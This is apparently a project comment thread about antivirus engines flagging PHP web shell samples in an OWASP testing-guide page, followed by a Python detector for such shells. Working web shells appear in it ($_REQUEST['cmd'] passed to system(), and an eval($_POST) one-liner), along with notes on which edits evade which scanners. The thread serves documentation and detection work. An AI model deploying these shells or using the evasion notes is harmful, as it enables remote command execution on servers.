Comments (12)
Very few AVs on VirusTotal also flag it: https://www.virustotal.com/gui/file-analysis/ZDdiYWFlMTM1YmEyYWQyNDkzM2ZiNTE3N2Y3MjVlNjg6MTU2MzQwOTE3Ng==/detection
https://www.virustotal.com/gui/file/2c38b233b56f2e566c90c32315335dab1fca9e0fbd64323a0666efcddd912d4f/detection
There's a good possibility that overzealous web browser protection or corporate proxies would also mark the samples as malware. (The resource hogging types that also install their root certificate to decrypt TLSv1.2.)
We could obfuscate the samples like this?
<?php
if(isset($CENSORED)){
echo "<pre>";
$cmd = ($CENSORED);
system($cmd);
echo "</pre>";
die;
}
?>
Replace $CENSORED with $_REQUEST['cmd']
Transforms (base64 encoding, nonprintable characters or similar) won't help either, because AV can detect that (I know by experience when someone imported a "font" that had real malware in it...). Also, other AVs like triggering on anything that looks like obfuscation.
from wstg.
We can create a list of system commands that can be run, and put in there the variable of that list, which should appear to be safe. What do you think?
Yup I noticed that the other day too. The content in question does include benign source code for an example web backdoor.
Feel free to review the content on GitHub and understand the reason it is a False Positive from defender.
(It’s a markdown file, the code isn’t executed unless you extract the snippet and place it on (or in) an appropriately configured execution environment.)
Fair enough, but if this is a false positive then it should be explicitly mentioned that one would be generated, since it is impossible to determine if the code snippet is what is being detected or if the file itself has truly been altered to include a virus.
It would be a clever trick for an actual hacker to infect a file that would be easily dismissed as a false positive.
Yup, just trying to give you options until it can be addressed somehow.
I like the idea of using $CENSORED as suggested, however, I need to review the content/context. We might be able to link elsewhere for code/samples ... or use a pseudo code block instead of real code.
I can confirm that my own Windows Defender only flags the following file:
OWASP-Testing-Guide-v5\document\4 Web Application Security Testing\4.11 Business Logic Testing\4.11.9 Test Upload of Malicious Files (OTG-BUSLOGIC-009).md
We can therefore try different combinations of "censoring" or obfuscating such that the code sample isn't functional without modification.
I haven't tried a full exploit, but I definitely can see why the AV would flag it... theoretically if you compromised a machine that had Git and PHP, you could theoretically get the server to execute the shellcode, similar to how you can dump shellcode into a log file or other upload and get the server to execute it. (I did that in a pentest exercise.)
I don't like the idea of linking because the thing we are linking to would be flagged by "web protection", or the linked material could simply be removed.
Hopefully the AV is only triggering on the string "REQUEST['cmd']", so maybe "REQUEST['aprogramthatisnotashellinanyos']"?
So much for the censored idea...
This is being detected as well
<?php
if(isset($_REQUEST['censored'])){
echo "<pre>";
$cmd = ($_REQUEST['censored']);
system($cmd);
echo "</pre>";
die;
}
?>
Now that I look at the code, it's probably because the AV doesn't like a PHP file with system( [something that can execute] ). I'll try swapping "system" for a censoring term.
Hmm pesky bugger... it also doesn't like
<?php @eval($_POST['password']);?>
I removed one of the three engine detections when I replaced system and eval with CENSORED, but unfortunately Windows Defender still calls it out, as Yorcirekrikseng instead of Chopper.
I'm going to assume some malware actually base64 encodes or otherwise obfuscates the "system" and "eval" in case dumber systems try to filter it out of uploads, so Defender is using a different pattern.
The pull request is for specifically the issue mentioned, which is Windows Defender (Microsoft's scanner) detecting the page as malware. Note that with the "CENSORED" strings I added, the code is no longer syntactically correct, and setting a server up to be dumb enough to execute the .md files will not result in a webshell behaviour.
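The thread's observations (renaming the request parameter changes nothing, censoring `system` and `eval` removes one engine's detection but not Defender's) are easier to reason about with a detector in hand. The script below is an added example, not code from the WSTG project or from anyone in this thread. It implements a toy rule of the kind a scanner or WAF might use: flag PHP text in which a request superglobal flows, directly or through one variable assignment, into a command or code execution sink. The `SAMPLES` dictionary holds the snippets quoted above plus two constructed ones (a version with the sinks replaced by `CENSORED`, as described in the later comments, and a benign snippet for contrast); the sink list and the verdict names are this example's own choices.

```python
import re

# Constructed sample set: the backdoor snippets quoted in this thread, a
# variant with the sinks censored (as the later comments describe doing), and
# a benign PHP fragment. These strings are scanned as data, never executed.
SAMPLES = {
    "request_cmd": """<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>""",
    "request_censored": """<?php
if(isset($_REQUEST['censored'])){
echo "<pre>";
$cmd = ($_REQUEST['censored']);
system($cmd);
echo "</pre>";
die;
}
?>""",
    "eval_post": "<?php @eval($_POST['password']);?>",
    # Constructed: sinks replaced by a placeholder, so the code cannot run.
    "sinks_censored": """<?php
if(isset($_REQUEST['cmd'])){
$cmd = ($_REQUEST['cmd']);
CENSORED($cmd);
}
?>""",
    # Constructed: request input is escaped and only echoed, no execution sink.
    "benign": """<?php
$name = htmlspecialchars($_GET['name'] ?? 'world');
echo "<p>Hello, $name</p>";
?>""",
}

# A request superglobal with its subscript, e.g. $_REQUEST['cmd'].
SUPERGLOBAL = r"\$_(?:REQUEST|GET|POST|COOKIE)\s*\[[^\]]*\]"
# Command / code execution functions this toy rule treats as sinks (assumed list).
SINK_NAMES = ("system", "exec", "shell_exec", "passthru", "popen",
              "proc_open", "eval", "assert")
SINK = r"\b(" + "|".join(SINK_NAMES) + r")\s*\("
# sink( ( $_REQUEST[...] ) ), allowing redundant parentheses.
DIRECT = re.compile(SINK + r"\s*\(*\s*" + SUPERGLOBAL)
# $var = ( $_REQUEST[...] ), i.e. a variable becoming tainted by request input.
ASSIGN = re.compile(r"(\$[A-Za-z_]\w*)\s*=\s*\(*\s*" + SUPERGLOBAL)


def scan_php(text):
    """Return a verdict and the reasons behind it for one PHP text."""
    reasons = []
    for m in DIRECT.finditer(text):
        reasons.append("direct: request input passed straight to %s()" % m.group(1))
    for m in ASSIGN.finditer(text):
        var = m.group(1)
        reasons.append("tainted: %s assigned from request input" % var)
        # Does the tainted variable reach a sink anywhere in the text?
        use = re.search(SINK + r"\s*\(*\s*" + re.escape(var) + r"\b", text)
        if use:
            reasons.append("indirect: %s reaches %s()" % (var, use.group(1)))
    if any(r.startswith(("direct", "indirect")) for r in reasons):
        verdict = "webshell-pattern"
    elif reasons:
        verdict = "tainted-input-only"
    else:
        verdict = "clean"
    return {"verdict": verdict, "reasons": reasons}


def scan_all():
    """Verdict per sample name, for the whole constructed sample set."""
    return {name: scan_php(src)["verdict"] for name, src in SAMPLES.items()}


if __name__ == "__main__":
    for name, src in SAMPLES.items():
        result = scan_php(src)
        print("%-17s %s" % (name, result["verdict"]))
        for reason in result["reasons"]:
            print("    " + reason)
```

Running it shows `request_cmd` and `request_censored` getting the same verdict and the same reasons, because the rule never looks at the parameter name, only at the path from `$_REQUEST[...]` to `system()`; `eval_post` is caught by the direct form. The `sinks_censored` variant drops to `tainted-input-only`, since this rule has nothing left to match once the sink names are gone, which is the behaviour the thread saw from one engine; that Defender still reports the censored file under a different name is consistent with it keying on additional features that this single rule does not model.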